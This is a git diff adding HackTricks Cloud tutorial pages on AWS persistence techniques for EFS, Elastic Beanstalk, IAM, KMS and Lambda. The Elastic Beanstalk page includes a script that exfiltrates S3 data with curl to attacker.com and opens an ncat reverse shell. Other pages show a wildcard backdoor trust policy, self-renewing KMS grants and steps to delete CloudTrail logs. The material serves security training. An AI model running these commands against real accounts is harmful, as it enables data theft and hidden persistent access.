+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md
new file mode 100644
index 0000000000..b534c2fd27
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-persistence/aws-efs-persistence.md
@@ -0,0 +1,47 @@
+# AWS - EFS Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## EFS
+
+For more information check:
+
+{% content-ref url="../aws-services/aws-efs-enum.md" %}
+[aws-efs-enum.md](../aws-services/aws-efs-enum.md)
+{% endcontent-ref %}
+
+### Modify Resource Policy / Security Groups
+
+Modifying the **resource policy and/or security groups** you can try to persist your access into the file system.
+
+### Create Access Point
+
+You could **create an access point** (with root access to `/`) accessible from a service were you have implemented **other persistence** to keep privileged access to the file system.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md
new file mode 100644
index 0000000000..068ef11c55
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-persistence/aws-elastic-beanstalk-persistence.md
@@ -0,0 +1,104 @@
+# AWS - Elastic Beanstalk Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Elastic Beanstalk
+
+For more information check:
+
+{% content-ref url="../aws-services/aws-elastic-beanstalk-enum.md" %}
+[aws-elastic-beanstalk-enum.md](../aws-services/aws-elastic-beanstalk-enum.md)
+{% endcontent-ref %}
+
+### Persistence in Instance
+
+In order to maintain persistence inside the AWS account, some **persistence mechanism could be introduced inside the instance** (cron job, ssh key...) so the attacker will be able to access it and steal IAM role **credentials from the metadata service**.
+
+### Backdoor in Version
+
+An attacker could backdoor the code inside the S3 repo so it always execute its backdoor and the expected code.
+
+### New backdoored version
+
+Instead of changing the code on the actual version, the attacker could deploy a new backdoored version of the application.
+
+### Abusing Custom Resource Lifecycle Hooks
+
+{% hint style="info" %}
+TODO: Test
+{% endhint %}
+
+Elastic Beanstalk provides lifecycle hooks that allow you to run custom scripts during instance provisioning and termination. An attacker could **configure a lifecycle hook to periodically execute a script that exfiltrates data or maintains access to the AWS account**.
+
+```bash
+bashCopy code# Attacker creates a script that exfiltrates data and maintains access
+echo '#!/bin/bash
+aws s3 cp s3://sensitive-data-bucket/data.csv /tmp/data.csv
+gzip /tmp/data.csv
+curl -X POST --data-binary "@/tmp/data.csv.gz" https://attacker.com/exfil
+ncat -e /bin/bash --ssl attacker-ip 12345' > stealthy_lifecycle_hook.sh
+
+# Attacker uploads the script to an S3 bucket
+aws s3 cp stealthy_lifecycle_hook.sh s3://attacker-bucket/stealthy_lifecycle_hook.sh
+
+# Attacker modifies the Elastic Beanstalk environment configuration to include the custom lifecycle hook
+echo 'Resources:
+  AWSEBAutoScalingGroup:
+    Metadata:
+      AWS::ElasticBeanstalk::Ext:
+        TriggerConfiguration:
+          triggers:
+            - name: stealthy-lifecycle-hook
+              events:
+                - "autoscaling:EC2_INSTANCE_LAUNCH"
+                - "autoscaling:EC2_INSTANCE_TERMINATE"
+              target:
+                ref: "AWS::ElasticBeanstalk::Environment"
+              arn:
+                Fn::GetAtt:
+                  - "AWS::ElasticBeanstalk::Environment"
+                  - "Arn"
+  stealthyLifecycleHook:
+    Type: AWS::AutoScaling::LifecycleHook
+    Properties:
+      AutoScalingGroupName:
+        Ref: AWSEBAutoScalingGroup
+      LifecycleTransition: autoscaling:EC2_INSTANCE_LAUNCHING
+      NotificationTargetARN:
+        Ref: stealthy-lifecycle-hook
+      RoleARN:
+        Fn::GetAtt:
+          - AWSEBAutoScalingGroup
+          - Arn' > stealthy_lifecycle_hook.yaml
+
+# Attacker applies the new environment configuration
+aws elasticbeanstalk update-environment --environment-name my-env --option-settings Namespace="aws:elasticbeanstalk:customoption",OptionName="CustomConfigurationTemplate",Value="stealthy_lifecycle_hook.yaml"
+```
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md
new file mode 100644
index 0000000000..accebf3999
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-persistence/aws-iam-persistence.md
@@ -0,0 +1,78 @@
+# AWS - IAM Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## IAM
+
+For more information access:
+
+{% content-ref url="../aws-services/aws-iam-enum.md" %}
+[aws-iam-enum.md](../aws-services/aws-iam-enum.md)
+{% endcontent-ref %}
+
+### Common IAM Persistence
+
+* Create a user
+* Add a controlled user to a privileged group
+* Create access keys (of the new user or of all users)
+* Grant extra permissions to controlled users/groups (attached policies or inline policies)
+* Disable MFA / Add you own MFA device
+* Create a Role Chain Juggling situation (more on this below in STS persistence)
+
+### Backdoor Role Trust Policies
+
+You could backdoor a trust policy to be able to assume it for an external resource controlled by you (or to everyone):
+
+```json
+{
+    "Version": "2012-10-17",
+    "Statement": [
+        {
+            "Effect": "Allow",
+            "Principal": {
+                "AWS": [
+                    "*",
+                    "arn:aws:iam::123213123123:root"
+                ]
+            },
+            "Action": "sts:AssumeRole"
+        }
+    ]
+}
+```
+
+### Backdoor Policy Version
+
+Give Administrator permissions to a policy in not its last version (the last version should looks legit), then assign that version of the policy to a controlled user/group.
+
+### Backdoor / Create Identity Provider
+
+If the account is already trusting a common identity provider (such as Github) the conditions of the trust could be increased so the attacker can abuse them.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md
new file mode 100644
index 0000000000..dbf4efa296
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-persistence/aws-kms-persistence.md
@@ -0,0 +1,66 @@
+# AWS - KMS Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## KMS
+
+For mor information check:
+
+{% content-ref url="../aws-services/aws-kms-enum.md" %}
+[aws-kms-enum.md](../aws-services/aws-kms-enum.md)
+{% endcontent-ref %}
+
+### Grant acces via KMS policies
+
+An attacker could use the permission **`kms:PutKeyPolicy`** to **give access** to a key to a user under his control or even to an external account. Check the [**KMS Privesc page**](../aws-privilege-escalation/aws-kms-privesc.md) for more information.
+
+### Eternal Grant
+
+Grants are another way to give a principal some permissions over a specific key. It's possible to give a grant that allows a user to create grants. Moreover, a user can have several grant (even identical) over the same key.
+
+Therefore, it's possible for a user to have 10 grants with all the permissions. The attacker should monitor this constantly. And if at some point 1 grant is removed another 10 should be generated.
+
+(We are using 10 and not 2 to be able to detect that a grant was removed while the user still has some grant)
+
+```bash
+# To generate grants, generate 10 like this one
+aws kms create-grant \
+    --key-id <key-id> \
+    --grantee-principal <user_arn> \
+    --operations "CreateGrant" "Decrypt"
+
+# To monitor grants
+aws kms list-grants --key-id <key-id>
+```
+
+{% hint style="info" %}
+A grant can give permissions only from this: [https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations](https://docs.aws.amazon.com/kms/latest/developerguide/grants.html#terms-grant-operations)
+{% endhint %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md b/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md
new file mode 100644
index 0000000000..13f2777a8e
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/README.md
@@ -0,0 +1,90 @@
+# AWS - Lambda Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Lambda
+
+For more information check:
+
+{% content-ref url="../../aws-services/aws-lambda-enum.md" %}
+[aws-lambda-enum.md](../../aws-services/aws-lambda-enum.md)
+{% endcontent-ref %}
+
+### Lambda Layer Persistence
+
+It's possible to **introduce/backdoor a layer to execute arbitrary code** when the lambda is executed in a stealthy way:
+
+{% content-ref url="aws-lambda-layers-persistence.md" %}
+[aws-lambda-layers-persistence.md](aws-lambda-layers-persistence.md)
+{% endcontent-ref %}
+
+### Lambda Extension Persistence
+
+Abusing Lambda Layers it's also possible to abuse extensions and persist in the lambda but also steal and modify requests.
+
+{% content-ref url="aws-abusing-lambda-extensions.md" %}
+[aws-abusing-lambda-extensions.md](aws-abusing-lambda-extensions.md)
+{% endcontent-ref %}
+
+### Via resource policies
+
+It's possible to grant access to different lambda actions (such as invoke or update code) to external accounts:
+
+<figure><img src="../../../../.gitbook/assets/image (255).png" alt=""><figcaption></figcaption></figure>
+
+### Versions, Aliases & Weights
+
+A Lambda can have **different versions** (with different code each version).\
+Then, you can create **different aliases with different versions** of the lambda and set different weights to each.\
+This way an attacker could create a **backdoored version 1** and a **version 2 with only the legit code** and **only execute the version 1 in 1%** of the requests to remain stealth.
+
+<figure><img src="../../../../.gitbook/assets/image (120).png" alt=""><figcaption></figcaption></figure>
+
+### Version Backdoor + API Gateway
+
+1. Copy the original code of the Lambda
+2. **Create a new version backdooring** the original code (or just with malicious code). Publish and **deploy that version** to $LATEST
+   1. Call the API gateway related to the lambda to execute the code
+3. **Create a new version with the original code**, Publish and deploy that **version** to $LATEST.
+   1. This will hide the backdoored code in a previous version
+4. Go to the API Gateway and **create a new POST method** (or choose any other method) that will execute the backdoored version of the lambda: `arn:aws:lambda:us-east-1:<acc_id>:function:<func_name>:1`
+   1. Note the final :1 of the arn **indicating the version of the function** (version 1 will be the backdoored one in this scenario).
+5. Select the POST method created and in Actions select **`Deploy API`**
+6. Now, when you **call the function via POST your Backdoor** will be invoked
+
+### Cron/Event actuator
+
+The fact that you can make **lambda functions run when something happen or when some time pass** makes lambda a nice and common way to obtain persistence and avoid detection.\
+Here you have some ideas to make your **presence in AWS more stealth by creating lambdas**.
+
+* Every time a new user is created lambda generates a new user key and send it to the attacker.
+* Every time a new role is created lambda gives assume role permissions to compromised users.
+* Every time new cloudtrail logs are generated, delete/alter them
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md b/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md
new file mode 100644
index 0000000000..aa8a0269f0
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-abusing-lambda-extensions.md
@@ -0,0 +1,69 @@
+# AWS - Abusing Lambda Extensions
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Lambda Extensions
+
+Lambda extensions enhance functions by integrating with various **monitoring, observability, security, and governance tools**. These extensions, added via [.zip archives using Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) or included in [container image deployments](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), operate in two modes: **internal** and **external**.
+
+* **Internal extensions** merge with the runtime process, manipulating its startup using **language-specific environment variables** and **wrapper scripts**. This customization applies to a range of runtimes, including **Java Correto 8 and 11, Node.js 10 and 12, and .NET Core 3.1**.
+* **External extensions** run as separate processes, maintaining operation alignment with the Lambda function's lifecycle. They're compatible with various runtimes like **Node.js 10 and 12, Python 3.7 and 3.8, Ruby 2.5 and 2.7, Java Corretto 8 and 11, .NET Core 3.1**, and **custom runtimes**.
+
+For more information about [**how lambda extensions work check the docs**](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-extensions-api.html).
+
+### External Extension for Persistence, Stealing Requests & modifying Requests
+
+This is a summary of the technique proposed in this post: [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/)
+
+It was found that the default Linux kernel in the Lambda runtime environment is compiled with “**process\_vm\_readv**” and “**process\_vm\_writev**” system calls. And all processes run with the same user ID, even the new process created for the external extension. **This means that an external extension has full read and write access to Rapid’s heap memory, by design.**
+
+Moreover, while Lambda extensions have the capability to **subscribe to invocation events**, AWS does not reveal the raw data to these extensions. This ensures that **extensions cannot access sensitive information** transmitted via the HTTP request.
+
+The Init (Rapid) process monitors all API requests at [http://127.0.0.1:9001](http://127.0.0.1:9001/) while Lambda extensions are initialized and run prior to the execution of any runtime code, but after Rapid.
+
+<figure><img src="../../../../.gitbook/assets/image (254).png" alt=""><figcaption><p><a href="https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.default.png">https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.default.png</a></p></figcaption></figure>
+
+The variable **`AWS_LAMBDA_RUNTIME_API`** indicates the **IP** address and **port** number of the Rapid API to **child runtime processes** and additional extensions.
+
+{% hint style="warning" %}
+By changing the **`AWS_LAMBDA_RUNTIME_API`** environment variable to a **`port`** we have access to, it's possible to intercept all actions within the Lambda runtime (**man-in-the-middle**). This is possible because the extension runs with the same privileges as Rapid Init, and the system's kernel allows for **modification of process memory**, enabling the alteration of the port number.
+{% endhint %}
+
+Because **extensions run before any runtime code**, modifying the environment variable will influence the runtime process (e.g., Python, Java, Node, Ruby) as it starts. Furthermore, **extensions loaded after** ours, which rely on this variable, will also route through our extension. This setup could enable malware to entirely bypass security measures or logging extensions directly within the runtime environment.
+
+<figure><img src="../../../../.gitbook/assets/image (267).png" alt=""><figcaption><p><a href="https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.mitm.png">https://www.clearvector.com/blog/content/images/size/w1000/2022/11/2022110801.rapid.mitm.png</a></p></figcaption></figure>
+
+The tool [**lambda-spy**](https://github.com/clearvector/lambda-spy) was created to perform that **memory write** and **steal sensitive information** from lambda requests, other **extensions** **requests** and even **modify them**.
+
+## References
+
+* [https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/](https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/)
+* [https://www.clearvector.com/blog/lambda-spy/](https://www.clearvector.com/blog/lambda-spy/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md b/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md
new file mode 100644
index 0000000000..dd762e60e1
--- /dev/null
+++ b/pentesting-cloud/aws-security/aws-persistence/aws-lambda-persistence/aws-lambda-layers-persistence.md
@@ -0,0 +1,160 @@
+# AWS - Lambda Layers Persistence
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Lambda Layers
+
+A Lambda layer is a .zip file archive that **can contain additional code** or other content. A layer can contain libraries, a [custom runtime](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-custom.html), data, or configuration files.
+
+It's possible to include up to **five layers per function**. When you include a layer in a function, the **contents are extracted to the `/opt`** directory in the execution environment.
+
+By **default**, the **layers** that you create are **private** to your AWS account. You can choose to **share** a layer with other accounts or to **make** the layer **public**. If your functions consume a layer that a different account published, your functions can **continue to use the layer version after it has been deleted, or after your permission to access the layer is revoked**. However, you cannot create a new function or update functions using a deleted layer version.
